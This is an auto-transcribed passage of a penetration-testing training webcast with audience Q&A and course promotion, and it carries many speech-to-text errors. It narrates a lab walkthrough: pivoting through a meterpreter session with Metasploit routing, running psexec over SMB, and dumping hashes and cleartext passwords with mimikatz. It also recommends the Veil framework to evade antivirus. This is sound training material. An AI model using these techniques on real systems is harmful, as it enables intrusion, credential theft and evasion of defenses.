dumping password hints you know how Windows machines allow you to have password hints know so you can type in there hey it’s your mother’s maiden name or remember to put the capital T in the password when you do run hash dump it’ll pull the password hints from the target machine as well I think it’s pretty cool all right next alright so what we’ve got so far is we’ve used some of the techniques we’ve described we’ve used a net cat relay to pivot through this Linux box we’ve got an existing meterpreter session coming back on TCP port 80 in this lab in the 560 class we continue going further what we do is we use MSF route remember I covered that earlier we use MSF route to pivot any traffic destined for 10 10 10 20 this is another Windows box on the DMZ see you can’t get to port for 4 or 5 from your Linux box to this 10 10 10 20 machine but this machine on the DMZ can see a lot of times they’ll allow things like TCP port 445 two different machines within the DMZ but you can’t get to four four five directly you have to pivot through so we’re gonna do is we’re gonna use this existing meterpreter session to find an MSF route to route through it and then utilize the native characteristics of ten ten ten ten so that it can communicate via TCP port 445 using SMB on this other machine ten ten ten twenty that’s going to give us a new meterpreter session back that will load mimic hats on to and then dump hashes and passwords that way all right so I show you again the picture here this Linux target we’re not using anymore because we use that just to get into ten ten ten ten once we’re in the ten ten ten ten we’ve got this beautiful meterpreter session that we’re gonna keep right we’re gonna do MSF route to pivot through that session so I’m gonna background my meterpreter session and notice it says here background in session one then I double-check am I at my MSF prom yes I am so I can use the route command here see if I use the route command at my meterpreter prompt I’m altering the routing tables of ten ten ten ten I don’t want to do that I want to pivot so my MSF of prompt I do route add ten ten ten twenty and then I give it a net mask and I’d like to do this where I get very precise I do five

that means any traffic that Metasploit generates for this specific IP address it’s got to match a hundred percent I want that to be carried through meterpreter session one and then I hit enter I now implemented my pivot so that I can then set my are host of ten ten ten twenty then I said my are port two four four five now I have to set it to four four five because that’s where ten ten ten twenty is listening for SMB before I didn’t have to set it to four four five because I was going through my net can’t relay which was listening on 4545 but now I have to set it to four or five so that I can get to ten 10 times 20 I said my L port to 443 the L port is where your meterpreter sessions gonna communicate back with and I like to do this I’ll use like port 80 for one of them and then port 443 for another one you could use 80 for all of them if you’d like or 443 for all of them but I like to kind of separate them out and in most environments port 80 or 443 is allowed outbound which is kind of cool alright so I set my our host 10 10 10 20 I set my our port 2 4 4 5 because that’s what 10 10 10 10 can communicate with 20 using I said my outport to four four three i show my options to make sure they’re all good and then I type exploit which is just the most wonderful command of any command-line language ever right now when I do that it says here that it’s uploading a payload which has that pseudo random name because I’m essentially PS execu and it says meterpreter to session opened now sometimes it’s got a little bit of a bug and it’ll say exploit failed the SMB server did not reply to our request but as long as you get the mature peer prompt it worked as long as you live interpreter braaap yeah you’re in there on ten ten ten twenty so i can show you that here by typing sis info it gives me information like the operating system hostname the the bill type and so forth and I can do IP config and you’ll see I am executing on ten ten ten twenty here so I used my existing meterpreter session to pivot through to get ten ten ten twenty now the meterpreter session coming back from ten ten ten twenty itself that’s a beautiful thing to what end we’ll watch this i’m a load mimic cats into my meterpreter session on ten ten ten twenty so now i can run a command like MSV and watch what MSV does nsv pulls information from specific areas of memory on that windows box to give me land man hashes and NT hashes now you might say but edie land man hashes are a thing of the past they’re gone now right I mean it was Windows Vista that eliminated land man hashes by default from the Windows registry yeah from the registry but I’m pulling these from memory and you’ll see that on a lot of Windows machines even though you don’t have land man hashes in the registry there’s still stuff that has land man hashes in memory so I always want to use a chance to get land man hashes because they’re much weaker and much easier to crack in the 560 class we talk about a bunch of different ways to dump these hashes and to crack them alright so here I got some land man hashes and some entity hashes but if I run the W digest command it actually shows me the clear text password of the currently logged in user on the machine and a clear text password will be displayed right on the screen on the output it’s pretty awesome alright when I finish I’m going to go ahead and exit this because I’ve plundered the target environment I’ve done hash dumping from ten ten ten ten I’ve gotten credentials including a clear text password from ten ten ten twenty so I’m gonna do exit that exits meterpreter session – if I do a sessions – L to list the sessions you see I still have a matter per session one open I’m gonna go ahead and kill that with sessions – Kay and then give it a session number that kills the session and then I can exit so I’ve shown you here how we can apply those different ideas that we started the webcast with – mercilessly pivot throughout the target environment so in conclusion pentesting can help an organization better understand its business risk and when you do pentesting i strongly advise you to consider pivoting through the target environment always staying within your scope in fact one of the themes of 560 is pivot mercilessly always staying within scope and always following rules of engagement and if you think about what we just covered here in our example pentesters can take advantage of Metasploit and the awesome meterpreter pay mode you can use PS exec for code execution via SMB that’s amazing and wonderful and and there I mean that’s just part of the feature set of Windows itself right you can use netcat relays as well as MSF console route to implement pivots we just showed you how and then I can do hash dump in a couple different ways I can do the hash dump command or I can type run hash dump and get hashes from the target box and run hash dump is safer and we even show me password hints and I can use mimic cats this fantastic tool to get credentials and then the cats has been fully integrated into the meterpreter this is awesome know your tools in depth in fact another theme of the 560 class is this it’s the ninja Fein in fact this is the coin from Sam security 560 I don’t show you the site for the ciphers on the back right but here’s the coin that you win if you win the capture the flag if you’re on the top team and or if you come to a coin of palooza the thing we’re gonna do it

sends a pen test austin you win this coin and on the back of the coin above the cipher it says this it’s not the weapon that’s important it’s the ninja wielding it our goal in the Sands 560 class is to help you improve your ninja skills so that you can do effective penetration testing that’s why we have this little inspirational thing on the back of this coin and again we should give props to our host and sponsor for this webcast Sam’s pen test Austin it’s coming up May 18th that’s a little more than a month away it’s like five or six weeks there’s a available discount if you sign up in the next week or two you can see that on the sans website go to sans org slash pentest 2015 it’s got six classes including the 401 class security essentials it’s got the 504 class on Incident Response and penned and hacker attacks it’s got the 560 class the one we’ve been talking about here and a whole bunch more we got three nights in that Wars we got one night of cyber city so you get to hack into our cyber city environment and stop terrorist attacks against it we’ve got coin a Palooza so you can earn up to five different sans pen test coins and then of course there’s the barbeque which I’m getting kind of hungry for right now so that’ll be in Austin Texas May 18th through 23rd let’s go ahead and open it up to some questions you guys have asked some wonderful questions so far let me go ahead and say here we go Adam says well av modules detect the executable drop by PS exec all right so here’s the deal if you’re using the Microsoft PS exec module that’s the one that you can freely download from Microsoft System journals antivirus tools tend not to notice that because it’s used as a legitimate system administration tool if you’re using the Metasploit version of PS exec the executable created by the PS exec module when you go ahead and launch it that payload might trigger an anti-virus tool what you’ll need to do is you’ll need to encode it in various ways so that it won’t and there’s a fantastic tool Adam called the veil framework it’s actually a whole set of tools and the veil framework allows you to alter the executable that you’ll then launched via Metasploit PS exec and therefore the answer virus tool will effectively be evaded the veil framework includes a whole bunch of different techniques and ideas that will alter an executable for antivirus evasion all right cool next next question is from Dwight where can the presentation be downloaded the download on the Sam site airs out yes because we make the slides available for download within 24 hours of delivering the webcast so you get the URL that you receive this as you download the slides here that will be active within 24 hours I understand from Trevor gonna be a little less than 24 hours but 24 hours is the promise that you’ll be able to download these slides thank you for your interest in that Dwight I appreciate it let’s see okay Eric asked a fantastic question sounds perfect for an external pen test but what are your thoughts on performing the internal pen testing I recommend you do it internal pen testing you can use the exact techniques we just described they’ll work fine for internal pen tests especially things like PS exec once once I get access to an internal environment whether it’s because I’m modeling a threat actor that has access to the internal environment or I fight my way in MPs exacting throughout the internal infrastructure I do think you should do internal pen test periodically because you’re modeling a different kind of threat your modeling may be a bad insider or your modeling somebody who is determined enough to get through your external defences if you do only external pen testing I think you’re missing out on a big piece of the picture so I strongly encourage you to do internal pen testing you can use the techniques and the tools we just described and I think they’ll serve you very well let’s see here yes Youssef says can we get a copy of the slides those slides will be available at the URL it was provided to you when you registered for this webcast and you know another thing to think about for those of you who do pen testing people people will ask me they say how can I start doing pen testing I love this idea of pen testing how can I do it um and the answer is this I actually wrote a I wrote a blog posting about a year and a half ago and it’s called so you wanna be a pen tester and it talks about three different ways to get into pen testing method number one involves you working for a company starting to help out with their pen testing maybe you’re on the security team maybe you’re not I recommend you just volunteer saying look there should be pen testing done here who does it and if they say it’s this team say I want to help that team I just want to go help them I’ll do it hours I’ll do just let me analyze it maybe some of the stuff they were working on I’m not gonna slow them down but I just want to start building some skills and helping them out so you could do that inside your own company method two what you could do is you could go and join a company because pen test professionally it’s a reasonable way to do it but they might have some you know sort

of barrier to entry method 3 you could start doing your own pen test on the side but be careful with that make sure you have appropriate insurance I in fact talked a little bit about that at the Sands 560 course and so you wanna be a pen tester is the name of that blog posting for that so so you can check that kind of thing out let’s see we’ve got a question here from Michael do you need route administrator level access to pivot via the meterpreter auto route you do not can you pivot through a standard Windows user yes you can so you do not have to have high privileges to implement these pivots which is actually quite beautiful now if you are pivoting through a Linux machine using the netcat relay I just showed you if you’re gonna listen on the port less than 1024 you’re gonna need root privileges but if you’re going through a Windows box as long as that port isn’t in use you can use it regardless of its port number so you can auto route through your pivots you could do pivots I did a webcast actually with John strand about six weeks ago or I showed you how you could use net s.h let me send this to all you can use the meta sage command to implement some really cool pivot features using built in features of Windows machines that particular penta that that was called pillage the village Redux that was a webcast that John strand and I did about six weeks ago and I show you even another way to pivot on Windows boxes using the net SH port proxy capability it’s pretty powerful and really cool stuff let’s see K sends an interesting request is there an online resource for pen test insurance if I want to pen test as a consultant I haven’t found one but I do send people to my insurance broker I know that sounds kind of weird but I have a wonderful insurance broker who knows the pen testing business and I’ve used him for like 12 or 13 years now and you know sometimes when my existing insurance policy needs to be renewed we he hunts around and finds me a decent price on other pentesting insurance if you email me my email address is edy at counter hakam if you email me kay I could hook you up with Anthony he is my um he’s my insurance agent I know it sounds kind of weird but I really like my insurance agent but he does a really good job for me so I think you’ll like that let’s see gurbin asks a question what’s your view on cobalt striking do you know better red team collaboration tools may also be run on top of Metasploit okay I love cobalt strike I think it’s great stuff I should point out that Raphael Mudge is a good friend of mine but that said I review tools independently of who’s my friend who’s not my friend cobalt strike is a commercial tool that runs on top of Metasploit and implements collaboration so you can have multiple pen testers collaborating using a collaboration server and you can handoff meterpreter sessions and other things to each other dynamically he’s also released a free tool called Armitage and before you go out and buy cobalt strike you should definitely check out Armitage Armitage and you send that to all because it’s written in a fashion consistent with cobalt strike cobalt strike includes a lot of additional capabilities and features but Armitage will give you an idea of what it’s all about and I recommend you check out Armitage and then if you really like that stuff and want some additional features and commercial support you can go and get cobalt strike Raphael Mudge has also done a comparison of what’s in Armitage the free tool that he makes available versus what’s in Armitage and you can find that if you do a google search of Armitage vs. cobalt strike I think you’ll find it really quite good and I see that’s bringing us now to the top of the hour yeah it’s a couple minutes afterwards I really do appreciate your guys time and attention thank you it was such a great thing to be able to talk with you on this webcast I hope I’ve given you some ideas that you can use in your next webcast and some references to some resources if you do need an insurance agent that can help you get some good pens house insurance email me and I will get back to you with Anthony Anthony’s contact information and also please do check out sans org slash pen test 2015 we got some really cool stuff coming up for you all right thanks guys you have a wonderful afternoon and hope to hear from you soon take care Trevor you want to close things out thanks Edie I would like yeah no problem I would love to say thank you so much to our featured speaker Edie for his great presentation and for bringing this content to the Saints community to our audience we greatly appreciate you listening in today for a schedule of all upcoming and archived webcast visits an org forward slash webcasts until next time take care and we hope to have you back

again for the next Stan’s webcast